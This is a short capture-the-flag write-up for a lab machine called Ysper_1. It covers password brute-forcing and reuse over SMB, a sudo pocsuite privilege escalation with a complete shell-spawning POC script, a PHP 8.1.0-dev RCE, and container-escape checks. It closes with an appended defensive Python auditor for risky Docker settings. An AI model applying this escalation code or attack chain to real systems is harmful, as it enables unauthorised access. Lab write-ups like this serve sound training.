Ysper-brand homemade target machine - Ysper_1
Brute-force the mailbox password


After the brute-force, the first flag is found inside the mailbox

Then use the cracked password 1q2w3e4r
to access SMB as the user faker
Download the source code:
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
Found in the source code


Got a shell
There is a flag in the database
The database password is root; it can also be found in the config file in the source code
sudo -l shows pocsuite can be run with faker's privileges
Escalate privileges to faker
cat << 'EOF' > /tmp/e.py
from pocsuite3.api import Output, POCBase, register_poc
import os

class POC(POCBase):
    vulID = "faker-001"  # any ID will do
    version = "1.0"
    author = "chatgpt"
    vulDate = "2025-04-20"
    createDate = "2025-04-20"
    updateDate = "2025-04-20"
    references = []
    name = "faker privilege shell"
    appPowerLink = "-"
    appName = "faker"
    appVersion = "1.0"
    vulType = "privilege escalation"
    desc = "spawn bash as faker user"

    def _verify(self):
        result = {}
        os.system("/bin/bash")  # for persistence, read the private key here
        return self.parse_output(Output(self))

    def _attack(self):
        return self._verify()

register_poc(POC)
EOF

sudo -u faker /usr/local/bin/pocsuite -u 127.0.0.1 -r /tmp/e.py


Port 8080 is clearly the one of interest
Proxy it out (port forward)



Exploit the PHP 8.1.0-dev RCE

Then it is just a simple container escape
ls -l /var/run/docker.sock             # check for the Docker socket
capsh --print | grep cap_sys_admin     # is this a privileged container?
mount | grep -E ' / | /host | /mnt'    # is the host filesystem mounted?
ls -la /proc/1/root                    # can /proc/1/root be accessed?
uname -a                               # kernel version
Finally we get:
Privileged-mode escape
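The escape above works because the container was started with `--privileged`. From the defender's side the same conditions the writeup checks from inside the container can be audited from the host before deployment. The following is an added example, not part of the original writeup and not the target machine's configuration: it reads a `docker inspect`-style JSON document (the `HostConfig` and `Mounts` field names follow Docker's real output; the two sample documents are constructed here) and reports the settings that make an escape trivial, then shows that a hardened configuration produces no findings.

```python
import json
from typing import List

# Constructed sample in the shape of `docker inspect <container>` output.
# This mirrors the weak setup the writeup found: privileged mode, CAP_SYS_ADMIN,
# the Docker socket and the host root bind-mounted, host PID namespace shared.
WEAK_INSPECT = json.dumps([{
    "Name": "/web",
    "HostConfig": {
        "Privileged": True,
        "CapAdd": ["SYS_ADMIN"],
        "PidMode": "host",
    },
    "Mounts": [
        {"Type": "bind", "Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock"},
        {"Type": "bind", "Source": "/", "Destination": "/host"},
    ],
}])

# Constructed hardened counterpart: no privileged flag, all capabilities dropped,
# no-new-privileges set, only a named volume mounted.
HARDENED_INSPECT = json.dumps([{
    "Name": "/web",
    "HostConfig": {
        "Privileged": False,
        "CapAdd": None,
        "CapDrop": ["ALL"],
        "PidMode": "",
        "SecurityOpt": ["no-new-privileges:true"],
    },
    "Mounts": [
        {"Type": "volume", "Source": "webdata", "Destination": "/var/www/data"},
    ],
}])

# Host paths that should never be bind-mounted into an untrusted container.
SENSITIVE_SOURCES = {"/", "/proc", "/sys", "/dev", "/etc", "/root", "/boot"}


def _norm_cap(cap: str) -> str:
    """Normalise 'cap_sys_admin' / 'SYS_ADMIN' to 'SYS_ADMIN'."""
    cap = cap.upper()
    return cap[4:] if cap.startswith("CAP_") else cap


def audit_container(inspect_json: str) -> List[str]:
    """Return one finding per escape-enabling setting found in the inspect document."""
    findings: List[str] = []
    for c in json.loads(inspect_json):
        name = c.get("Name", "?")
        hc = c.get("HostConfig") or {}
        if hc.get("Privileged"):
            findings.append(f"{name}: privileged mode (all capabilities, raw device access)")
        caps = {_norm_cap(cap) for cap in (hc.get("CapAdd") or [])}
        if "SYS_ADMIN" in caps:
            findings.append(f"{name}: CAP_SYS_ADMIN added (mount and cgroup operations allowed)")
        if hc.get("PidMode") == "host":
            findings.append(f"{name}: host PID namespace shared (host /proc/1/root reachable)")
        for m in c.get("Mounts") or []:
            if m.get("Type") != "bind":
                continue
            src = (m.get("Source") or "").rstrip("/") or "/"
            if src.endswith("docker.sock"):
                findings.append(f"{name}: Docker socket bind-mounted at {m.get('Destination')}")
            elif src in SENSITIVE_SOURCES:
                findings.append(f"{name}: host path {src} bind-mounted at {m.get('Destination')}")
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_INSPECT), ("hardened", HARDENED_INSPECT)):
        found = audit_container(doc)
        print(f"[{label}] {len(found)} finding(s)")
        for f in found:
            print("  -", f)
```

Run it against a real container with `docker inspect <name> | python3 audit.py` after replacing the constructed samples with `json.load(sys.stdin)`. The hardened document corresponds to starting the container with `--cap-drop ALL --security-opt no-new-privileges` and without `--privileged`, `--pid host`, or bind mounts of `/` or `/var/run/docker.sock`; with those settings every check in the writeup's list comes back negative.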
